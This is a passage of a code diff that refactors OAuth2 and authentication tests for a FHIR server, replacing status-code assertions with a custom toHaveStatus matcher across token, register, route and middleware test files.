@@ -207,7 +207,7 @@ describe('Auth middleware', () => {
     const res = await request(app)
       .get('/fhir/R4/Patient')
       .set('Authorization', 'Basic ' + Buffer.from(client.id + ':' + client.secret).toString('base64'));
-    expect(res.status).toBe(401);
+    expect(res).toHaveStatus(401);
   });
 
   test('Basic auth with super admin client', async () => {
@@ -216,7 +216,7 @@ describe('Auth middleware', () => {
     const res = await request(app)
       .get(`/fhir/R4/Project?_total=accurate&_id=${project.id},${otherProject.id}`)
       .set('Authorization', 'Basic ' + Buffer.from(client.id + ':' + client.secret).toString('base64'));
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.body.total).toBe(2);
   });
 });

--- a/packages/server/src/oauth/register.test.ts
+++ b/packages/server/src/oauth/register.test.ts
@@ -29,7 +29,7 @@ describe('OAuth2 register', () => {
 
   test('Missing redirect_uri', async () => {
     const res = await request(app).post('/oauth2/register').type('json').send({});
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body.error).toBe('invalid_request');
     expect(res.body.error_description).toBe('Redirect URI is required');
   });
@@ -41,7 +41,7 @@ describe('OAuth2 register', () => {
       .send({
         redirect_uris: ['https://unknown.example.com/callback'],
       });
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body.error).toBe('invalid_request');
     expect(res.body.error_description).toBe('Invalid redirect URI');
   });
@@ -53,7 +53,7 @@ describe('OAuth2 register', () => {
       .send({
         redirect_uris: ['https://example.com/callback'],
       });
-    expect(res.status).toBe(201);
+    expect(res).toHaveStatus(201);
     expect(res.body.client_id).toBe('example');
     expect(res.body.client_secret).toBeUndefined();
     expect(res.body.client_id_issued_at).toBeDefined();

--- a/packages/server/src/oauth/routes.test.ts
+++ b/packages/server/src/oauth/routes.test.ts
@@ -31,13 +31,13 @@ describe('OAuth Routes', () => {
         client_secret: client.secret as string,
       });
 
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
 
     const res2 = await request(app)
       .post('/fhir/R4/Patient/$validate')
       .set('Authorization', 'Bearer ' + res.body.access_token)
       .send({ resourceType: 'Patient' });
 
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
   });
 });

--- a/packages/server/src/oauth/token.test.ts
+++ b/packages/server/src/oauth/token.test.ts
@@ -252,7 +252,7 @@ describe('OAuth2 Token', () => {
     const res = await request(app).post('/oauth2/token').type('json').send({
       foo: 'bar',
     });
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.text).toBe('Unsupported content type');
   });
 
@@ -261,7 +261,7 @@ describe('OAuth2 Token', () => {
       grant_type: '',
       code: 'fake-code',
     });
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body.error).toBe('invalid_request');
     expect(res.body.error_description).toBe('Missing grant_type');
   });
@@ -271,7 +271,7 @@ describe('OAuth2 Token', () => {
       grant_type: 'xyz',
       code: 'fake-code',
     });
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body.error).toBe('invalid_request');
     expect(res.body.error_description).toBe('Unsupported grant_type');
   });
@@ -282,7 +282,7 @@ describe('OAuth2 Token', () => {
       client_id: client.id,
       client_secret: client.secret,
     });
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.body.error).toBeUndefined();
     expect(res.body.access_token).toBeDefined();
   });
@@ -293,7 +293,7 @@ describe('OAuth2 Token', () => {
       client_id: '',
       client_secret: 'big-long-string',
     });
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body.error).toBe('invalid_request');
     expect(res.body.error_description).toBe('Missing client_id');
   });
@@ -304,7 +304,7 @@ describe('OAuth2 Token', () => {
       client_id: client.id,
       client_secret: '',
     });
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body.error).toBe('invalid_request');
     expect(res.body.error_description).toBe('Missing client_secret');
   });
@@ -315,7 +315,7 @@ describe('OAuth2 Token', () => {
       client_id: randomUUID(),
       client_secret: 'big-long-string',
     });
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body.error).toBe('invalid_request');
     expect(res.body.error_description).toBe('Invalid client');
   });
@@ -326,7 +326,7 @@ describe('OAuth2 Token', () => {
       client_id: client.id,
       client_secret: 'wrong-client-id',
     });
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body.error).toBe('invalid_request');
     expect(res.body.error_description).toBe('Invalid secret');
   });
@@ -337,7 +337,7 @@ describe('OAuth2 Token', () => {
       client_id: client.id,
       client_secret: client.retiringSecret,
     });
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.body.error).toBeUndefined();
     expect(res.body.access_token).toBeDefined();
   });
@@ -350,7 +350,7 @@ describe('OAuth2 Token', () => {
       .send({
         grant_type: 'client_credentials',
       });
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.body.error).toBeUndefined();
     expect(res.body.access_token).toBeDefined();
   });
@@ -359,7 +359,7 @@ describe('OAuth2 Token', () => {
     const res = await request(app).post('/oauth2/token').type('form').set('Authorization', 'Bearer xyz').send({
       grant_type: 'client_credentials',
     });
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body.error).toBe('invalid_request');
     expect(res.body.error_description).toBe('Invalid authorization header');
   });
@@ -382,7 +382,7 @@ describe('OAuth2 Token', () => {
       .type('form')
       .set('Authorization', 'Basic ' + header)
       .send();
-    expect(res.status).toBe(401);
+    expect(res).toHaveStatus(401);
   });
 
   test('Token for client empty secret', async () => {
@@ -402,7 +402,7 @@ describe('OAuth2 Token', () => {
       client_id: badClient.id,
       client_secret: 'wrong-client-secret',
     });
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body.error).toBe('invalid_request');
     expect(res.body.error_description).toBe('Invalid client');
   });
@@ -421,7 +421,7 @@ describe('OAuth2 Token', () => {
       client_id: client.id,
       client_secret: client.secret,
     });
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body.error).toBe('invalid_request');
     expect(res.body.error_description).toBe('Invalid client');
   });
@@ -435,7 +435,7 @@ describe('OAuth2 Token', () => {
       client_id: client.id,
       client_secret: client.secret,
     });
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body.error).toBe('invalid_request');
     expect(res.body.error_description).toBe('Invalid client');
   });
@@ -449,7 +449,7 @@ describe('OAuth2 Token', () => {
       client_id: client.id,
       client_secret: client.secret,
     });
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.body.error).toBeUndefined();
     expect(res.body.access_token).toBeDefined();
   });
@@ -462,19 +462,19 @@ describe('OAuth2 Token', () => {
       client_id: client.id,
       client_secret: client.secret,
     });
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.body.error).toBeUndefined();
     const accessToken = res.body.access_token;
     expect(accessToken).toBeDefined();
 
     const res1 = await request(app).get('/auth/me').set('Authorization', `Bearer ${accessToken}`).send();
-    expect(res1.status).toBe(200);
+    expect(res1).toHaveStatus(200);
 
     // Disable membership, access should be denied after
     await systemRepo.updateResource<ProjectMembership>({ ...membership, active: false });
 
     const res2 = await request(app).get('/auth/me').set('Authorization', `Bearer ${accessToken}`).send();
-    expect(res2.status).toBe(401);
+    expect(res2).toHaveStatus(401);
   });
 
   test('Client credentials IP address restriction', async () => {
@@ -498,7 +498,7 @@ describe('OAuth2 Token', () => {
       client_id: client.id,
       client_secret: client.secret,
     });
-    expect(res1.status).toBe(400);
+    expect(res1).toHaveStatus(400);
     expect(res1.body.error).toBe('invalid_request');
     expect(res1.body.error_description).toBe('IP address not allowed');
 
@@ -509,7 +509,7 @@ describe('OAuth2 Token', () => {
       client_id: client.id,
       client_secret: client.secret,
     });
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
     expect(res2.body.error).toBeUndefined();
     expect(res2.body.access_token).toBeDefined();
   });
@@ -520,7 +520,7 @@ describe('OAuth2 Token', () => {
       code: '',
       code_verifier: 'xyz',
     });
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body.error).toBe('invalid_request');
     expect(res.body.error_description).toBe('Missing code');
   });
@@ -531,7 +531,7 @@ describe('OAuth2 Token', () => {
       code: 'xyzxyz',
       code_verifier: 'xyz',
     });
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body.error).toBe('invalid_request');
     expect(res.body.error_description).toBe('Invalid code');
   });
@@ -543,7 +543,7 @@ describe('OAuth2 Token', () => {
       code: '',
       code_verifier: 'xyz',
     });
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body.error).toBe('invalid_request');
     expect(res.body.error_description).toBe('Missing code');
   });
@@ -554,7 +554,7 @@ describe('OAuth2 Token', () => {
       code: '',
       code_verifier: 'xyz',
     });
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body.error).toBe('invalid_request');
     expect(res.body.error_description).toBe('Invalid authorization header');
   });
@@ -564,13 +564,13 @@ describe('OAuth2 Token', () => {
       email,
       password,
     });
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
 
     const res2 = await request(app).post('/oauth2/token').type('form').send({
       grant_type: 'authorization_code',
       code: res.body.code,
     });
-    expect(res2.status).toBe(400);
+    expect(res2).toHaveStatus(400);
     expect(res2.body.error).toBe('invalid_request');
     expect(res2.body.error_description).toBe('Missing verification context');
   });
@@ -582,13 +582,13 @@ describe('OAuth2 Token', () => {
       codeChallenge: 'xyz',
       codeChallengeMethod: 'plain',
     });
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
 
     const res2 = await request(app).post('/oauth2/token').type('form').send({
       grant_type: 'authorization_code',
       code: res.body.code,
     });
-    expect(res2.status).toBe(400);
+    expect(res2).toHaveStatus(400);
     expect(res2.body.error).toBe('invalid_request');
     expect(res2.body.error_description).toBe('Missing code verifier');
   });
@@ -601,14 +601,14 @@ describe('OAuth2 Token', () => {
       codeChallengeMethod: 'plain',
       scope: 'openid profile email',
     });
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
 
     const res2 = await request(app).post('/oauth2/token').type('form').send({
       grant_type: 'authorization_code',
       code: res.body.code,
       code_verifier: 'xyz',
     });
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
     expect(res2.body.token_type).toBe('Bearer');
     expect(res2.body.scope).toBe('openid profile email');
     expect(res2.body.expires_in).toBe(3600);
@@ -628,7 +628,7 @@ describe('OAuth2 Token', () => {
       codeChallengeMethod: 'plain',
       scope: 'openid profile email',
     });
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
 
     const res2 = await request(app)
       .post('/oauth2/token')
@@ -639,7 +639,7 @@ describe('OAuth2 Token', () => {
         code: res.body.code,
         code_verifier: 'incorrect',
       });
-    expect(res2.status).toBe(400);
+    expect(res2).toHaveStatus(400);
     expect(res2.body.access_token).toBeUndefined();
   });
 
@@ -651,13 +651,13 @@ describe('OAuth2 Token', () => {
       codeChallenge: 'xyz',
       codeChallengeMethod: 'plain',
     });
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
 
     const res2 = await request(app).post('/oauth2/token').type('form').send({
       grant_type: 'authorization_code',
       code: res.body.code,
     });
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
     expect(res2.body.token_type).toBe('Bearer');
     expect(res2.body.scope).toBe('openid');
     expect(res2.body.expires_in).toBe(3600);
@@ -672,7 +672,7 @@ describe('OAuth2 Token', () => {
       email,
       password,
     });
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
 
     const res2 = await request(app).post('/oauth2/token').type('form').send({
       grant_type: 'authorization_code',
@@ -680,7 +680,7 @@ describe('OAuth2 Token', () => {
       client_id: pkceOptionalClient.id,
       client_secret: 'wrong',
     });
-    expect(res2.status).toBe(400);
+    expect(res2).toHaveStatus(400);
     expect(res2.body.error).toBe('invalid_request');
     expect(res2.body.error_description).toBe('Invalid secret');
   });
@@ -691,7 +691,7 @@ describe('OAuth2 Token', () => {
       email,
       password,
     });
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
 
     const res2 = await request(app).post('/oauth2/token').type('form').send({
       grant_type: 'authorization_code',
@@ -699,7 +699,7 @@ describe('OAuth2 Token', () => {
       client_id: pkceOptionalClient.id,
       client_secret: pkceOptionalClient.retiringSecret,
     });
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
     expect(res2.body.error).toBeUndefined();
     expect(res2.body.access_token).toBeDefined();
   });
@@ -710,7 +710,7 @@ describe('OAuth2 Token', () => {
       email,
       password,
     });
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
 
     const res2 = await request(app).post('/oauth2/token').type('form').send({
       grant_type: 'authorization_code',
@@ -718,7 +718,7 @@ describe('OAuth2 Token', () => {
       client_id: pkceOptionalClient.id,
       client_secret: pkceOptionalClient.secret,
     });
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
     expect(res2.body.token_type).toBe('Bearer');
     expect(res2.body.scope).toBe('openid');
     expect(res2.body.expires_in).toBe(3600);
@@ -734,7 +734,7 @@ describe('OAuth2 Token', () => {
       codeChallenge: 'xyz',
       codeChallengeMethod: 'plain',
     });
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
 
     // Find the login
     const loginBundle = await systemRepo.search<Login>(parseSearchRequest('Login?code=' + res.body.code));
@@ -754,7 +754,7 @@ describe('OAuth2 Token', () => {
       code: res.body.code,
       code_verifier: 'xyz',
     });
-    expect(res2.status).toBe(400);
+    expect(res2).toHaveStatus(400);
     expect(res2.body.error).toBe('invalid_grant');
     expect(res2.body.error_description).toBe('Token revoked');
   });
@@ -767,14 +767,14 @@ describe('OAuth2 Token', () => {
       codeChallengeMethod: 'plain',
       remember: true,
     });
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
 
     const res2 = await request(app).post('/oauth2/token').type('form').send({
       grant_type: 'authorization_code',
       code: res.body.code,
       code_verifier: 'xyz',
     });
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
     expect(res2.body.token_type).toBe('Bearer');
     expect(res2.body.scope).toBe('openid');
     expect(res2.body.expires_in).toBe(3600);
@@ -791,14 +791,14 @@ describe('OAuth2 Token', () => {
       codeChallengeMethod: 'plain',
       scope: 'openid offline',
     });
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
 
     const res2 = await request(app).post('/oauth2/token').type('form').send({
       grant_type: 'authorization_code',
       code: res.body.code,
       code_verifier: 'xyz',
     });
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
     expect(res2.body.token_type).toBe('Bearer');
     expect(res2.body.scope).toBe('openid offline');
     expect(res2.body.expires_in).toBe(3600);
@@ -815,14 +815,14 @@ describe('OAuth2 Token', () => {
       codeChallengeMethod: 'plain',
       scope: 'openid offline_access',
     });
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
 
     const res2 = await request(app).post('/oauth2/token').type('form').send({
       grant_type: 'authorization_code',
       code: res.body.code,
       code_verifier: 'xyz',
     });
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
     expect(res2.body.token_type).toBe('Bearer');
     expect(res2.body.scope).toBe('openid offline_access');
     expect(res2.body.expires_in).toBe(3600);
@@ -839,7 +839,7 @@ describe('OAuth2 Token', () => {
       codeChallenge: 'xyz',
       codeChallengeMethod: 'plain',
     });
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
 
     const res2 = await request(app).post('/oauth2/token').type('form').send({
       grant_type: 'authorization_code',
@@ -847,7 +847,7 @@ describe('OAuth2 Token', () => {
       code: res.body.code,
       code_verifier: 'xyz',
     });
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
     expect(res2.body.token_type).toBe('Bearer');
     expect(res2.body.scope).toBe('openid');
     expect(res2.body.expires_in).toBe(3600);
@@ -862,7 +862,7 @@ describe('OAuth2 Token', () => {
       codeChallenge: 'xyz',
       codeChallengeMethod: 'plain',
     });
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
 
     const res2 = await request(app).post('/oauth2/token').type('form').send({
       grant_type: 'authorization_code',
@@ -870,7 +870,7 @@ describe('OAuth2 Token', () => {
       code: res.body.code,
       code_verifier: 'xyz',
     });
-    expect(res2.status).toBe(400);
+    expect(res2).toHaveStatus(400);
     expect(res2.body.error).toBe('invalid_request');
     expect(res2.body.error_description).toBe('Invalid client');
   });
@@ -882,14 +882,14 @@ describe('OAuth2 Token', () => {
       codeChallenge: 'xyz',
       codeChallengeMethod: 'plain',
     });
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
 
     const res2 = await request(app).post('/oauth2/token').type('form').send({
       grant_type: 'authorization_code',
       code: res.body.code,
       code_verifier: 'xyz',
     });
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
     expect(res2.body.token_type).toBe('Bearer');
     expect(res2.body.scope).toBe('openid');
     expect(res2.body.expires_in).toBe(3600);
@@ -901,7 +901,7 @@ describe('OAuth2 Token', () => {
       code: res.body.code,
       code_verifier: 'xyz',
     });
-    expect(res3.status).toBe(400);
+    expect(res3).toHaveStatus(400);
     expect(res3.body.error).toBe('invalid_grant');
     expect(res3.body.error_description).toBe('Token already granted');
   });
@@ -911,7 +911,7 @@ describe('OAuth2 Token', () => {
       grant_type: 'refresh_token',
       refresh_token: '',
     });
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body.error).toBe('invalid_request');
     expect(res.body.error_description).toBe('Invalid refresh token');
   });
@@ -921,7 +921,7 @@ describe('OAuth2 Token', () => {
       grant_type: 'refresh_token',
       refresh_token: 'xyz',
     });
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body.error).toBe('invalid_request');
     expect(res.body.error_description).toBe('Invalid refresh token');
   });
@@ -934,14 +934,14 @@ describe('OAuth2 Token', () => {
       codeChallengeMethod: 'plain',
       scope: 'openid offline_access',
     });
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
 
     const res2 = await request(app).post('/oauth2/token').type('form').send({
       grant_type: 'authorization_code',
       code: res.body.code,
       code_verifier: 'xyz',
     });
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
     expect(res2.body.token_type).toBe('Bearer');
     expect(res2.body.scope).toBe('openid offline_access');
     expect(res2.body.expires_in).toBe(3600);
@@ -953,7 +953,7 @@ describe('OAuth2 Token', () => {
       grant_type: 'refresh_token',
       refresh_token: res2.body.refresh_token,
     });
-    expect(res3.status).toBe(200);
+    expect(res3).toHaveStatus(200);
     expect(res3.body.token_type).toBe('Bearer');
     expect(res3.body.scope).toBe('openid offline_access');
     expect(res3.body.expires_in).toBe(3600);
@@ -969,14 +969,14 @@ describe('OAuth2 Token', () => {
       codeChallenge: 'xyz',
       codeChallengeMethod: 'plain',
     });
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
 
     const res2 = await request(app).post('/oauth2/token').type('form').send({
       grant_type: 'authorization_code',
       code: res.body.code,
       code_verifier: 'xyz',
     });
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
     expect(res2.body.token_type).toBe('Bearer');
     expect(res2.body.scope).toBe('openid');
     expect(res2.body.expires_in).toBe(3600);
@@ -988,7 +988,7 @@ describe('OAuth2 Token', () => {
       grant_type: 'refresh_token',
       refresh_token: res2.body.refresh_token,
     });
-    expect(res3.status).toBe(400);
+    expect(res3).toHaveStatus(400);
     expect(res3.body).toMatchObject({
       error: 'invalid_request',
       error_description: 'Invalid refresh token',
@@ -1003,14 +1003,14 @@ describe('OAuth2 Token', () => {
       codeChallengeMethod: 'plain',
       scope: 'openid offline_access',
     });
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
 
     const res2 = await request(app).post('/oauth2/token').type('form').send({
       grant_type: 'authorization_code',
       code: res.body.code,
       code_verifier: 'xyz',
     });
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
     expect(res2.body.token_type).toBe('Bearer');
     expect(res2.body.scope).toBe('openid offline_access');
     expect(res2.body.expires_in).toBe(3600);
@@ -1027,7 +1027,7 @@ describe('OAuth2 Token', () => {
       grant_type: 'refresh_token',
       refresh_token: invalidRefreshToken,
     });
-    expect(res3.status).toBe(400);
+    expect(res3).toHaveStatus(400);
     expect(res3.body).toMatchObject({
       error: 'invalid_request',
       error_description: 'Invalid refresh token',
@@ -1046,14 +1046,14 @@ describe('OAuth2 Token', () => {
       codeChallengeMethod: 'S256',
       scope: 'openid offline_access',
     });
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
 
     const res2 = await request(app).post('/oauth2/token').type('form').send({
       grant_type: 'authorization_code',
       code: res.body.code,
       code_verifier: codeHash, // sending hash, should be code
     });
-    expect(res2.status).toBe(400);
+    expect(res2).toHaveStatus(400);
   });
 
   test('Refresh token success with S256 code', async () => {
@@ -1068,14 +1068,14 @@ describe('OAuth2 Token', () => {
       codeChallengeMethod: 'S256',
       scope: 'openid offline_access',
     });
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
 
     const res2 = await request(app).post('/oauth2/token').type('form').send({
       grant_type: 'authorization_code',
       code: res.body.code,
       code_verifier: code,
     });
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
     expect(res2.body.token_type).toBe('Bearer');
     expect(res2.body.scope).toBe('openid offline_access');
     expect(res2.body.expires_in).toBe(3600);
@@ -1087,7 +1087,7 @@ describe('OAuth2 Token', () => {
       grant_type: 'refresh_token',
       refresh_token: res2.body.refresh_token,
     });
-    expect(res3.status).toBe(200);
+    expect(res3).toHaveStatus(200);
     expect(res3.body.token_type).toBe('Bearer');
     expect(res3.body.scope).toBe('openid offline_access');
     expect(res3.body.expires_in).toBe(3600);
@@ -1104,14 +1104,14 @@ describe('OAuth2 Token', () => {
       codeChallengeMethod: 'plain',
       scope: 'openid offline_access',
     });
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
 
     const res2 = await request(app).post('/oauth2/token').type('form').send({
       grant_type: 'authorization_code',
       code: res.body.code,
       code_verifier: 'xyz',
     });
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
     expect(res2.body.token_type).toBe('Bearer');
     expect(res2.body.scope).toBe('openid offline_access');
     expect(res2.body.expires_in).toBe(3600);
@@ -1136,7 +1136,7 @@ describe('OAuth2 Token', () => {
       grant_type: 'refresh_token',
       refresh_token: res2.body.refresh_token,
     });
-    expect(res3.status).toBe(400);
+    expect(res3).toHaveStatus(400);
     expect(res3.body.error).toBe('invalid_grant');
     expect(res3.body.error_description).toBe('Token revoked');
   });
@@ -1161,14 +1161,14 @@ describe('OAuth2 Token', () => {
       codeChallengeMethod: 'plain',
       scope: 'openid offline_access',
     });
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
 
     const res2 = await request(app).post('/oauth2/token').type('form').send({
       grant_type: 'authorization_code',
       code: res.body.code,
       code_verifier: 'xyz',
     });
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
     expect(res2.body.refresh_token).toBeDefined();
 
     // Find the login
@@ -1191,7 +1191,7 @@ describe('OAuth2 Token', () => {
       grant_type: 'refresh_token',
       refresh_token: res2.body.refresh_token,
     });
-    expect(res3.status).toBe(400);
+    expect(res3).toHaveStatus(400);
     expect(res3.body.error).toBe('access_denied');
     expect(res3.body.error_description).toBe('Profile not active');
   });
@@ -1205,14 +1205,14 @@ describe('OAuth2 Token', () => {
       codeChallengeMethod: 'plain',
       scope: 'openid offline_access',
     });
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
 
     const res2 = await request(app).post('/oauth2/token').type('form').send({
       grant_type: 'authorization_code',
       code: res.body.code,
       code_verifier: 'xyz',
     });
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
     expect(res2.body.token_type).toBe('Bearer');
     expect(res2.body.scope).toBe('openid offline_access');
     expect(res2.body.expires_in).toBe(3600);
@@ -1228,7 +1228,7 @@ describe('OAuth2 Token', () => {
         grant_type: 'refresh_token',
         refresh_token: res2.body.refresh_token,
       });
-    expect(res3.status).toBe(200);
+    expect(res3).toHaveStatus(200);
     expect(res3.body.token_type).toBe('Bearer');
     expect(res3.body.scope).toBe('openid offline_access');
     expect(res3.body.expires_in).toBe(3600);
@@ -1246,14 +1246,14 @@ describe('OAuth2 Token', () => {
       codeChallengeMethod: 'plain',
       scope: 'openid offline_access',
     });
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
 
     const res2 = await request(app).post('/oauth2/token').type('form').send({
       grant_type: 'authorization_code',
       code: res.body.code,
       code_verifier: 'xyz',
     });
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
     expect(res2.body.token_type).toBe('Bearer');
     expect(res2.body.scope).toBe('openid offline_access');
     expect(res2.body.expires_in).toBe(3600);
@@ -1269,7 +1269,7 @@ describe('OAuth2 Token', () => {
         grant_type: 'refresh_token',
         refresh_token: res2.body.refresh_token,
       });
-    expect(res3.status).toBe(400);
+    expect(res3).toHaveStatus(400);
     expect(res3.body.error).toBe('invalid_request');
     expect(res3.body.error_description).toBe('Invalid authorization header');
   });
@@ -1283,14 +1283,14 @@ describe('OAuth2 Token', () => {
       codeChallengeMethod: 'plain',
       scope: 'openid offline_access',
     });
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
 
     const res2 = await request(app).post('/oauth2/token').type('form').send({
       grant_type: 'authorization_code',
       code: res.body.code,
       code_verifier: 'xyz',
     });
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
     expect(res2.body.token_type).toBe('Bearer');
     expect(res2.body.scope).toBe('openid offline_access');
     expect(res2.body.expires_in).toBe(3600);
@@ -1306,7 +1306,7 @@ describe('OAuth2 Token', () => {
         grant_type: 'refresh_token',
         refresh_token: res2.body.refresh_token,
       });
-    expect(res3.status).toBe(400);
+    expect(res3).toHaveStatus(400);
     expect(res3.body.error).toBe('invalid_grant');
     expect(res3.body.error_description).toBe('Incorrect client');
   });
@@ -1320,14 +1320,14 @@ describe('OAuth2 Token', () => {
       codeChallengeMethod: 'plain',
       scope: 'openid offline_access',
     });
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
 
     const res2 = await request(app).post('/oauth2/token').type('form').send({
       grant_type: 'authorization_code',
       code: res.body.code,
       code_verifier: 'xyz',
     });
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
     expect(res2.body.token_type).toBe('Bearer');
     expect(res2.body.scope).toBe('openid offline_access');
     expect(res2.body.expires_in).toBe(3600);
@@ -1343,7 +1343,7 @@ describe('OAuth2 Token', () => {
         grant_type: 'refresh_token',
         refresh_token: res2.body.refresh_token,
       });
-    expect(res3.status).toBe(400);
+    expect(res3).toHaveStatus(400);
     expect(res3.body.error).toBe('invalid_grant');
     expect(res3.body.error_description).toBe('Incorrect client secret');
   });
@@ -1364,7 +1364,7 @@ describe('OAuth2 Token', () => {
       codeChallengeMethod: 'plain',
       scope: 'openid offline_access',
     });
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
 
     // 2) Get tokens with grant_type=authorization_code
     const res2 = await request(app).post('/oauth2/token').type('form').send({
@@ -1372,7 +1372,7 @@ describe('OAuth2 Token', () => {
       code: res.body.code,
       code_verifier: 'xyz',
     });
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
     expect(res2.body.token_type).toBe('Bearer');
     expect(res2.body.scope).toBe('openid offline_access');
     expect(res2.body.expires_in).toBe(3600);
@@ -1385,7 +1385,7 @@ describe('OAuth2 Token', () => {
       grant_type: 'refresh_token',
       refresh_token: res2.body.refresh_token,
     });
-    expect(res3.status).toBe(200);
+    expect(res3).toHaveStatus(200);
     expect(res3.body.token_type).toBe('Bearer');
     expect(res3.body.scope).toBe('openid offline_access');
     expect(res3.body.expires_in).toBe(3600);
@@ -1398,7 +1398,7 @@ describe('OAuth2 Token', () => {
       grant_type: 'refresh_token',
       refresh_token: res3.body.refresh_token,
     });
-    expect(res4.status).toBe(200);
+    expect(res4).toHaveStatus(200);
     expect(res4.body.token_type).toBe('Bearer');
     expect(res4.body.scope).toBe('openid offline_access');
     expect(res4.body.expires_in).toBe(3600);
@@ -1411,7 +1411,7 @@ describe('OAuth2 Token', () => {
       grant_type: 'refresh_token',
       refresh_token: res2.body.refresh_token,
     });
-    expect(res5.status).toBe(400);
+    expect(res5).toHaveStatus(400);
     expect(res5.body).toMatchObject({ error: 'invalid_request', error_description: 'Invalid token' });
   });
 
@@ -1434,7 +1434,7 @@ describe('OAuth2 Token', () => {
       codeChallengeMethod: 'plain',
       scope: 'openid offline_access',
     });
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
 
     const res2 = await request(app).post('/oauth2/token').type('form').send({
       grant_type: 'authorization_code',
@@ -1444,7 +1444,7 @@ describe('OAuth2 Token', () => {
       scope: 'openid offline_access',
     });
 
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
     expect(res2.body.token_type).toBe('Bearer');
     expect(res2.body.scope).toBe('openid offline_access');
     expect(res2.body.expires_in).toBe(60);
@@ -1498,7 +1498,7 @@ describe('OAuth2 Token', () => {
       codeChallengeMethod: 'plain',
       scope: 'openid offline_access',
     });
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
 
     const res2 = await request(app).post('/oauth2/token').type('form').send({
